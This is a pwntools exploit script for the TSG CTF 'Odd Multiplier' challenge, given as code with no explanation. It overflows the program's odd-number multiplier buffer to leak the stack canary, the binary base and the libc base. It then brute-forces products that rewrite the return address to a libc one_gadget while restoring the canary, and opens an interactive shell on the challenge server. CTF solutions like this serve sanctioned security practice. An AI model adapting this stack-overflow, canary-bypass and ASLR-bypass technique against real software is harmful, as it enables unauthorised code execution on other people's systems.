TSG CTF Odd Multiplier

exp.py

#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('')
elf = ELF('./multiplier')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # output verbose log

RHOST = "34.85.75.40"
RPORT = 30002
LHOST = "127.0.0.1"
LPORT = 30002

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./multiplier'], gdbscript=gdbscript)
else:
    conn = process(['./multiplier'])
    # conn = process(['./multiplier'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')

for i in range(0x19):
    time.sleep(0.0001)
    conn.sendline('255')
time.sleep(0.0001)
conn.sendline('0')

conn.recvuntil('I will multiply odd numbers until you enter 0\n\n')
canary = int(conn.recv(len('43b2be9a63a61a'))+'00', 16)
conn.recvuntil('\n')
dbg('canary')

for i in range(0x21):
    time.sleep(0.0001)
    conn.sendline('255')
time.sleep(0.0001)
conn.sendline('0')
conn.recvuntil('\n')
bin_base = int(conn.recv(len('43b2be9a63a6')), 16) - 0xce0
conn.recvuntil('\n')
dbg('bin_base')

for i in range(0x29):
    time.sleep(0.0001)
    conn.sendline('255')
time.sleep(0.0001)
conn.sendline('0')
conn.recvuntil('\n')
libc_base = int(conn.recv(len('43b2be9a63a6')), 16) - 0x21bda
dbg('libc_base')


def gen(target, length):
    for x in range(3, 0x100, 2):
        for y in range(3, 0x100, 2):
            for z in range(3, 0x100, 2):
                buf = hex(0xff**(length-2)*x*y*z)[2:]
                if len(buf) == length*2 + 2:
                    if (buf[0:2] == hex(target)[2:]):
                        print buf[0:2], hex(target)[2:], len(buf)
                        return [x, y, z]
def gen2(target, length):
    for x in range(0xff, 1, -2):
        for y in range(0xff, 1, -2):
            for z in range(0xff, 1, -2):
                for w in range(0xff, 1, -2):
                    buf = hex(0xff**(length-3)*x*y*z*w)[2:]
                    if len(buf) == length*2 + 2:
                        if (buf[0:2] == hex(target)[2:]):
                            print buf[0:2], hex(target)[2:], len(buf)
                            return [x, y, z, w]

def gen3(target, length):
    for x in range(0xff, 1, -2):
        for y in range(0xff, 1, -2):
            for z in range(0xff, 1, -2):
                for w in range(0xff, 1, -2):
                    buf = hex(0xff**(length-3)*x*y*z*w)[2:]
                    if len(buf) == length*2 + 2:
                        if (buf[0:4] == hex(target)[2:]+'00'):
                            print buf[0:4], hex(target)[2:]+'00', len(buf)
                            return [x, y, z, w]
one_gadget = p64(libc_base+0x4f322)
for i in range(0x2, -1, -1):
    n = gen(ord(one_gadget[i]), 0x28+i)

    for j in range(0x28+i-2):
        conn.sendline('255')
        time.sleep(0.00001)
    for j in n:
        conn.sendline(str(j))
        time.sleep(0.00001)
    conn.sendline('0')


for i in range(7, 1, -1):
    n = gen2(ord(p64(canary)[i]), 0x18+i)

    for j in range(0x18+i-3):
        conn.sendline('255')
        time.sleep(0.00001)
    for j in n:
        conn.sendline(str(j))
        time.sleep(0.00001)
    conn.sendline('0')

n = gen3(ord(p64(canary)[1]), 0x18+1)
for j in range(0x19-3):
    conn.sendline('255')
    time.sleep(0.00001)
for j in n:
    conn.sendline(str(j))
    time.sleep(0.00001)
conn.sendline('0')


conn.interactive()